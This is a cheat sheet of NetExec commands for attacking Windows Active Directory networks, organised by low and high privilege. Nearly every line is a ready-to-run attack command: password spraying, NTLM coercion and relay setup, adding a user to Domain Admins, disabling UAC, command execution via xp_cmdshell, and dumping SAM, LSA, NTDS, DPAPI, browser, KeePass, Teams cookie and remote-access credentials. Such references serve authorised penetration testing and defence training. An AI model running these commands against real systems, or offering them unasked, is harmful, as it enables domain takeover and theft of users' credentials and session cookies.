
Latest Windows and Linux versions can be downloaded from here.

New techniques can be found on this Twitter profile.

Official wiki.

Info

Most of these modules require local administrator privileges.

Low privilege

Enumeration

List users:

nxc ldap $IP -u username -p 'password' --users

RID brute force:

nxc smb $IP -u username -p 'password' --rid-brute

Create wordlist for password spray or ASREP-roast:

nxc smb $IP -d domain.local -u username -p 'password' --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users

LDAP queries:

nxc ldap $IP -u username -p 'password' --query "(sAMAccountName=username)" ""

User description:

nxc ldap $IP -u username -p 'password' -M get-desc-users

Check groups:

nxc ldap $IP -u username -p 'password' --groups

Multiple users enumeration:

nxc ldap $IP -u username -p 'password' --users user1 user2

BloodHound ingestor:

nxc smb $IP -u username -p 'password' --bloodhound -c All

Password policy check:

nxc ldap $IP -u username -p 'password' -M pso
nxc smb $IP -u username -p 'password' --pass-pol

RDP screenshot, when NLA is disabled:

nxc rdp $IP --nla-screenshot

Password change:

nxc smb $IP -u username -p 'password' -M change-password -o USER=target NEWPASS=password

User information:

nxc wmi $IP -u username -p 'password' --wmi "SELECT * FROM Win32_UserAccount"

Task manager:

nxc smb $IP -u username -p 'password' --tasklist

Windows Defender settings:

nxc smb $IP -u username -p 'password' -M wcc

Subnet enumeration:

nxc smb $IP -u username -p 'password' --interfaces

Directory listing:

nxc smb $IP -u username -p 'password' --share SHARE --dir "directory"

Read files:

nxc smb $IP -u username -p 'password' -M notepad++

WebDAV service status check:

nxc smb $IP -u username -p 'password' -M webdav

AD CS enumeration:

nxc smb $IP -u username -p 'password' -M certipy_find

Privilege escalation

SMB relay:

nxc smb scope.txt --gen-relay-list targets.txt

Creating shortcut files on SMB shares, for Responder:

nxc smb $IP -u username -p 'password' -M slinky

Password spray (also works with the rdp and winrm protocols):

nxc smb $IP -u username -p passwords.txt --continue-on-success

Channel binding:

nxc ldap $IP -u username -p 'password' -M ldap-checker

Certificate authentication:

nxc ldap $IP -d domain.local -u username --pfx-cert user.pfx

Coercion for ESC8:

nxc smb $IP -u username -p 'password' -M coerce_plus -o M=petitpotam L=$IP

MachineAccountQuota check:

nxc ldap $IP -u username -p 'password' -M maq

Computer domain join:

nxc ldap $IP -u username -p 'password' -M add-computer -o NAME=computer PASSWORD='password'

NTLM reflection:

nxc ldap $IP -u username -p 'password' -M ntlm_reflection

Pre-Windows 2000:

nxc ldap $IP -u username -p 'password' -M pre2k

Coercion with all techniques combined (PetitPotam, DFSCoerce, MSEven, ShadowCoerce and PrinterBug):

nxc smb $IP -u username -p 'password' -M coerce_plus -o LISTENER=$IP

SMB Ghost vulnerability check:

nxc smb $IP -M smbghost

Enumerating old Windows servers:

nxc ldap $IP -u username -p 'password' -M obsolete

Timeroasting, obtains the NT hash from any computer account:

nxc smb $IP -M timeroast

Credential dump

Group Policy password check:

nxc smb $IP -u username -p 'password' -M gpp_password

File share enumeration:

nxc smb $IP -u username -p 'password' -M spider_plus -o DOWNLOAD_FLAG=True

High privilege

Enumeration

PowerShell command execution:

nxc smb $IP -u username -p 'password' -X ipconfig --force-ps32

SCCM enumeration:

nxc smb $IP -u username -p 'password' --sccm
nxc smb $IP -u username -p 'password' -M sccm -o REC_RESOLVE=TRUE
nxc smb $IP -u username -p 'password' -M sccm-recon6 --dns-server $IP

LAPS enumeration:

nxc smb $IP -u username -p 'password' --laps

File transfer over SSH:

nxc ssh $IP -u username -p 'password' --put-file test.txt /tmp/test.txt

Privilege escalation

Add a user to the Domain Admins group in the context of a logged-on Domain Admin. Sessions can be checked with the --loggedon-users or --reg-sessions parameter.

nxc smb $IP -u username -p 'password' -M schtask_as -o USER=DA CMD="powershell.exe net group \"Domain Admins\" user /add /domain"

Impersonate logged-on users by abusing AD CS. The NT hash is obtained over PKINIT:

nxc smb $IP -u username -p 'password' -M masky -o CA='ADCS.domain.local\ADCS-CA'

Token impersonation, automatically escalates privileges:

nxc smb $IP -u username -p 'password' -M impersonate

Enumerate delegations:

nxc ldap $IP -u username -p 'password' --find-delegation
nxc smb $IP -u username -p 'password' --delegate administrator

Disable UAC:

nxc smb $IP -u username -p 'password' -M remote-uac -o ACTION=disable

Check RDP sessions:

nxc smb $IP -u username -p 'password' --qwinsta

Enable RDP:

nxc smb $IP -u username -p 'password' -M rdp

Shadow RDP:

nxc smb $IP -u username -p 'password' -M shadowrdp -o ACTION=disable

MSSQL enumeration and exploitation:

nxc mssql $IP -u username -p 'password' -M mssql_priv

MSSQL coercion:

nxc mssql $IP -u username -p 'password' -M mssql_coerce -o L=$IP

Executing SQL queries:

nxc mssql $IP -u username -p 'password' -q 'SELECT name FROM master.dbo.sysdatabases;'

Execute commands with xp_cmdshell:

nxc mssql $IP -u username -p 'password' -x command

File download:

nxc mssql $IP -u username -p 'password' --get-file remote_file local_file

NFS escape to root:

nxc nfs $IP --get-file '/etc/passwd' etc_passwd
nxc nfs $IP --ls

Credential dump

SAM, LSA, DPAPI and NTDS dump; the updated version doesn't touch the disk:

nxc smb $IP -u username -p 'password' --sam --lsa --dpapi --ntds

DPAPI hash dump:

nxc smb $IP -u username -p 'password' --local-auth -M dpapi_hash -o "OUTPUTFILE=hashes.txt"

Check autologon credentials in registry:

nxc smb $IP -u username -p 'password' -M reg-winlogon

Backup operator privileges, useful for NTDS dump:

nxc smb $IP -u username -p 'password' -M backup_operator

NTDS.dit dump:

nxc smb $IP -u username -p 'password' -M ntdsutil
nxc smb $IP -u username -p 'password' -M ntds-dump-raw

Veeam SQL database dump:

nxc smb $IP -u username -p 'password' -M veeam

Firefox credentials dump:

nxc smb $IP -u username -p 'password' -M firefox

Dump credentials from remote access applications:

nxc smb $IP -u username -p 'password' -M putty
nxc smb $IP -u username -p 'password' -M winscp
nxc smb $IP -u username -p 'password' -M vnc
nxc smb $IP -u username -p 'password' -M mremoteng
nxc smb $IP -u username -p 'password' -M mobaxterm

PowerShell history enumeration:

nxc smb $IP -u username -p 'password' -M powershell_history

KeePass process and database enumeration:

nxc smb $IP -u username -p 'password' -M keepass_discover

Microsoft Teams cookie dump:

nxc smb $IP -u username -p 'password' -M teams_localdb

Check credentials in EventViewer logs:

nxc smb $IP -u username -p 'password' -M eventlog_creds

Recent files enumeration:

nxc smb $IP -u username -p 'password' -M recent_files

Clipboard dump:

nxc smb $IP -u username -p 'password' -M snipped

Find passwords in IIS Application Pool config:

nxc smb $IP -u username -p 'password' -M iis

Extract the password of a gMSA account over LDAPS:

nxc ldap $IP -u username -p 'password' --gmsa
nxc ldap $IP -u username -p 'password' --gmsa-decrypt-lsa user